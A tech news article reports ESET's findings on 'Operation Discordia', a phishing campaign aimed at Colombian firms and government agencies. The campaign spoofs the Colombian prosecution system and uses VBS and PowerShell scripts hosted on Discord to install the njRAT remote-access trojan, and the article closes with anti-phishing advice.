Connect with us

Hi, what are you looking for?

Tech News

Cyber ​​espionage identified in Colombia to companies and government entities

Cyber ​​espionage identified in Colombia to companies and government entities

They discover a malware called njRAT.  (photo: ifep.com/Scyther)
They discover a malware called njRAT. (photo: ifep.com/Scyther)

Recently, a campaign of espionage directed mainly at Colombia, which had significant activity until the end of March this year. The cyber criminals have been trying to spread the malware njRAT, a common type of trojan remote access, and remain on the compromised computer undetected for as long as possible.

The campaign was named “Operation Discordia” by researchers at ESET. This is because attackers use the platform Discord to host and download malware onto compromised computers. The platform was originally intended for gamers, but it gradually grew and cybercriminals also started using it to host malware and perform other malicious actions.

The main victims are companies from different sectors, non-profit organizations and government agencies. This malicious code downloaded allows attackers to remotely control the infected computer and perform actions such as:

Advertisement. Scroll to continue reading.

– Send and receive files.

– Record keystrokes.

– Take screenshots.

Advertisement. Scroll to continue reading.

– Take pictures with the camera and record audio, etc.

A person uses a laptop, in a file photograph.  EFE/Sascha Steinbach
A person uses a laptop, in a file photograph. EFE/Sascha Steinbach

The method to gain initial access and start the chain of infection until the njRAT download starts with emails from phishing which are believed to be official communications from the Colombian System of Oral Crimes (SPOA). These emails include compressed files as attachments protected by a four-digit password.

Although there are no examples of these phishing emails, the names of some of these files zip attachments they can already give an idea of ​​the context of the messages. Next, the following is known:

– “Tax notification in your name We appreciate prompt confirmation of receipt in addition to filling out the form within the attachment.bz2”

Advertisement. Scroll to continue reading.

– “I request you to register the corresponding marginal note in the original civil registry of birth of the interested parties FILE KEY 0903.R19”

– “Fiscal requirement here you will find a copy of the complaint filed against you NUNC SPOA.bz2″

On the other hand, the names of the files contained in the downloaded file, which can be two or more files, also provide some clues. As you can see in the image below, these are files with the extension .vbs. These files are scripts developed using the Visual Basic programming language.

Advertisement. Scroll to continue reading.
Example of the files with the .vbs extension contained in one of the compressed files that were sent as an attachment in the phishing emails.  (photo: ESET)
Example of the files with the .vbs extension contained in one of the compressed files that were sent as an attachment in the phishing emails. (photo: ESET)

Two different methods of infection

The people who carried out this campaign used two different infection mechanisms, but both tried to download njRAT as a last resort.

“If we pay attention to the following image, we can see that many of the names used for the variables are in Spanish. And if we add to this the themes used in the compressed files, it is possible that the malicious actors behind this campaign are Spanish-speaking.” Miguel Angel Mendoza, Computer Security Researcher at ESET Latin America.

General diagram of the infection chain in Operation Discordia that distributes njRAT.  (photo: ESET)
General diagram of the infection chain in Operation Discordia that distributes njRAT. (photo: ESET)

– Method 1

The attached files had a .bz2 extension and contained malicious scripts developed in Visual Basic, which, when executed, download a PowerShell script that is hosted on Discord and which in turn downloads other modules from the same platform, which are the ones that end up downloading njRAT in the team.

Advertisement. Scroll to continue reading.

The following image shows an example of the malicious code within these PowerShell scripts:

Example of a malicious code contained in the Visual Basic script.  (photo: ESET)
Example of a malicious code contained in the Visual Basic script. (photo: ESET)

– Method 2

In some cases a different infection method was detected which also starts with a Visual Basic script that downloads another PowerShell script from Discord which makes it check if the path HKCU:softwarewow6432nodeMicrosoftWindowsUpdate exists in the logs. Windows.

If the path exists, it stores AES-encrypted malicious code.

Advertisement. Scroll to continue reading.
Malicious code stored in Windows registries.  (photo: ESET)
Malicious code stored in Windows registries. (photo: ESET)

Recommendations to avoid being a victim of malware

The main recommendation to avoid being a victim of this type of campaign is to have special care with the emails that arrive in the inbox.

It’s important to pay attention to the sender’s email address, the body of the message, whether it was an unexpected email, and whether the message made sense. In case of doubt, do not click on any links, nor download any attachments. Attackers often mask the actual format of a file by renaming the file to look like a different extension.

Last but not least, it’s always good install a reliable security solution on the device to filter out these threats as soon as they hit an email account.

Advertisement. Scroll to continue reading.

Advertisement. Scroll to continue reading.
Advertisement
Advertisement

Related

“Rescue Mission 2″: Joe Russo reveals more details of the sequel with Chris Hemsworth

Entertainment

“Rescue Mission” is one of the most watched and most played films on Netflix. (Netflix) Since its premiere in 2020, Rescue Mission (Extraction) became...

Huawei announces mobile WiFi 3 Pro router, Tag and new colors for the P50 Pocket Huawei announces mobile WiFi 3 Pro router, Tag and new colors for the P50 Pocket

Android

At an event this Monday morning (04), Huawei presented several products, in addition to the long-awaited Nova 10 line phones. Among them is the...

Premieres in streaming: week of July 4 to 10 Premieres in streaming: week of July 4 to 10

Entertainment

The top premieres that you can enjoy this first week of July. (Apple TV+, Netflix, NBC, Paramount Pictures, Starzplay) These next 7 days of...

Responding to hate with pride and joy: the Heartstopper actors' lesson to the world Responding to hate with pride and joy: the Heartstopper actors' lesson to the world

Entertainment

In the video that went viral this weekend, the actors of the series Heartstopper jump and dance before LGBT protesters (Video: Twitter @SkyScottBeasley) They...

Advertisement

You May Also Like

Tech News

These projects seek to transform the educational system In Colombia, a team of students from the Cartagena International School, together with their technological entrepreneurship...

Android

The Republican Commissioner of the FCC (Federal Communications Commission), Brendan Carr, sent a request for Apple and Google to remove TikTok from their app...

Entertainment

Interview with Emilia Attias and Paula Reca for “En la mira” in the sights had its way through movie theaters in the month of...

Tech News

corporate threats. (photo: Dir&Ge) The cyber criminals use different alternatives to carry out malicious activities, from exploiting misconfigured databases, to socialization techniques to trick...

Advertisement